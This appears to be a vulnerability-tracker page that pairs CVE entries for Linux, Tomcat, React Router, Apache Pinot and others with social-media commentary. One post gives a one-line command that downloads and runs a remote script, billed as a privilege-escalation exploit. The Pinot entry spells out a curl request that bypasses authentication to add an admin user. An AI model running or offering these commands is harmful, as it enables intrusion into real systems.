
Overview

  • 1902756969
  • reggie

12 Jan 2025
Published
13 Jan 2025
Updated

CVSS v4.0
MEDIUM (6.9)
EPSS
0.08%

KEV

Description

A vulnerability classified as critical has been found in 1902756969 reggie 1.0. Affected is the function download of the file src/main/java/com/itheima/reggie/controller/CommonController.java. The manipulation of the argument name leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Statistics

  • 1 Post
  • 61 Interactions

Fediverse

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL thc.org/7350pipe)”

Overview

  • Linux
  • Linux

15 Jan 2025
Published
23 Jan 2025
Updated

CVSS
Pending
EPSS
0.02%

KEV

Description

In the Linux kernel, the following vulnerability has been resolved: mptcp: fix TCP options overflow. Syzbot reported the following splat:

Oops: general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN PTI
KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
CPU: 1 UID: 0 PID: 5836 Comm: sshd Not tainted 6.13.0-rc3-syzkaller #0
RIP: 0010:put_page+0x23/0x260 include/linux/mm.h:1552
[register dump and call trace omitted]

Eric noted a probable shinfo->nr_frags corruption, which indeed occurs. The root cause is a buggy MPTCP option len computation in some circumstances: the ADD_ADDR option should be mutually exclusive with DSS since the blamed commit. Still, mptcp_established_options_add_addr() tries to set the relevant info in mptcp_out_options, if ---truncated---

Statistics

  • 3 Posts
  • 3 Interactions

Fediverse

Linux kernel: CVE-2024-57882 fix did not prevent data stream corruption in the MPTCP protocol

https://seclists.org/oss-sec/2025/q2/0

"The analyze(sic!) of the patch (https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=cbb26f7d8451fe56ccac802c6db48d16240feebd) reveals that the root cause of the bug has been partially fixed."

This follow-up to CVE-2024-57882 by Solar Designer is also worth reading:

https://seclists.org/oss-sec/2025/q2/3

"A reason CVE-2024-57882 may have stayed unpatched in a distro is it could have been wrongly believed to be a NULL pointer dereference only due to a specific crash reported by Syzbot."

"net.mptcp.enabled can be set from inside an unprivileged net namespace"

Linux kernel: CVE-2024-57882 fix did not prevent data stream corruption in the MPTCP protocol

seclists.org/oss-sec/2025/q2/0

Overview

  • Pending

15 Jan 2014
Published
06 Aug 2024
Updated

CVSS
Pending
EPSS
0.41%

KEV

Description

Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors.

Statistics

  • 1 Post
  • 14 Interactions

Fediverse

Overview

  • Pending

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Directory Traversal vulnerability in ONLYOFFICE Document Server v.7.5.0 and before allows a remote attacker to obtain sensitive information via a crafted file upload.

Statistics

  • 1 Post
  • 13 Interactions

Fediverse

Researchers, you don't need to be this patient. Just publish that shit.

medium.com/@mihat2/onlyoffice-

  • October 10, 2023 – The moment I realized the flaw was real, I immediately reached out to ONLYOFFICE’s security team. To my surprise, they responded the same day! To ensure they had all the details, I sent them a thorough PDF report outlining the vulnerability, complete with technical analysis, proof-of-concept, and potential impact. I thought this was going to be a smooth disclosure process — how wrong I was.
  • October 11 — November 19, 2023 — I followed up. Again. And again. Silence. Maybe my emails were lost? Maybe they were ignoring me? Either way, weeks passed, and still — no response.
  • November 20, 2023 – We submitted the vulnerability to HackerOne, hoping to reach ONLYOFFICE through another channel.
  • December 4, 2023 – With no response from HackerOne, we escalated the report to HackerOne Disclosure Assistance, but STILL received no response.
  • February 19, 2024 – ONLYOFFICE finally responded, stating that they were working on a fix.
  • February 26, 2024 – ONLYOFFICE released a fix for the vulnerability.
  • April 1, 2024 – ONLYOFFICE informed us that while the fix was available, some products would not receive the security patch until Summer 2024. They requested that we delay public disclosure until July 2024.
  • February 21, 2025 – HackerOne Disclosure Assistance responded, stating that they were reviewing the backlog and asked for an update on the current situation.

nvd.nist.gov/vuln/detail/CVE-2

Overview

  • remix-run
  • react-router

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS v3.0
HIGH (7.5)
EPSS
Pending

KEV

Description

React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.

Statistics

  • 1 Post
  • 7 Interactions

Fediverse

Simple and practical vulns like this are always nice to read about and learn from and replicate.

github.com/remix-run/react-rou

sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

nvd.nist.gov/vuln/detail/CVE-2

Overview

  • Apache Software Foundation
  • Apache Parquet Java
  • org.apache.parquet:parquet-avro

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS v4.0
CRITICAL (10.0)
EPSS
0.09%

KEV

Description

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code. Users are recommended to upgrade to version 1.15.1, which fixes the issue.

Statistics

  • 1 Post
  • 5 Interactions

Fediverse

And we have a perfect 10 in Apache Parquet, whatever that is. 🥳

sev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

nvd.nist.gov/vuln/detail/CVE-2

Overview

  • Apache Software Foundation
  • Apache Tomcat

10 Mar 2025
Published
01 Apr 2025
Updated

CVSS
Pending
EPSS
89.64%

Description

Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.

If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:

  • writes enabled for the default servlet (disabled by default)
  • support for partial PUT (enabled by default)
  • a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads
  • attacker knowledge of the names of security sensitive files being uploaded
  • the security sensitive files also being uploaded via partial PUT

If all of the following were true, a malicious user was able to perform remote code execution:

  • writes enabled for the default servlet (disabled by default)
  • support for partial PUT (enabled by default)
  • application was using Tomcat's file based session persistence with the default storage location
  • application included a library that may be leveraged in a deserialization attack

Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.

Statistics

  • 1 Post
  • 3 Interactions

Fediverse

Looks like CISA is now satisfied and has added CVE-2025-24813 (Apache Tomcat Path Equivalence Vulnerability) to the KEV Catalog.

Overview

  • Microsoft
  • Azure Health Bot

01 Apr 2025
Published
02 Apr 2025
Updated

CVSS v3.1
HIGH (8.3)
EPSS
0.08%

KEV

Description

An authenticated attacker can exploit a Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.

Statistics

  • 1 Post
  • 4 Interactions

Fediverse

Another Microsoft cloud service vuln got patched. They claim no exploitation and it wasn't publicly known so you should be okay but that trust thing is hard.

msrc.microsoft.com/update-guid

sev:HIGH 8.3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

nvd.nist.gov/vuln/detail/CVE-2

Overview

  • Kentico
  • Xperience

24 Mar 2025
Published
24 Mar 2025
Updated

CVSS v3.1
MEDIUM (6.5)
EPSS
0.03%

KEV

Description

The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS. This issue affects Kentico Xperience through 13.0.178.

Statistics

  • 1 Post
  • 2 Interactions

Fediverse

I know that many of us tend to scoff at XSS vulns, but it's good to be reminded how they can be successfully used in a chain for something more interesting.

labs.watchtowr.com/xss-to-rce-

Overview

  • Apache Software Foundation
  • Apache Pinot
  • org.apache.pinot.controller.api

01 Apr 2025
Published
01 Apr 2025
Updated

CVSS
Pending
EPSS
0.03%

KEV

Description

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

Statistics

  • 1 Post
  • 2 Interactions

Fediverse

I don't know Apache Pinot but this seems like a good one to keep in your back pocket.

lists.apache.org/thread/ksf8qs

nvd.nist.gov/vuln/detail/CVE-2
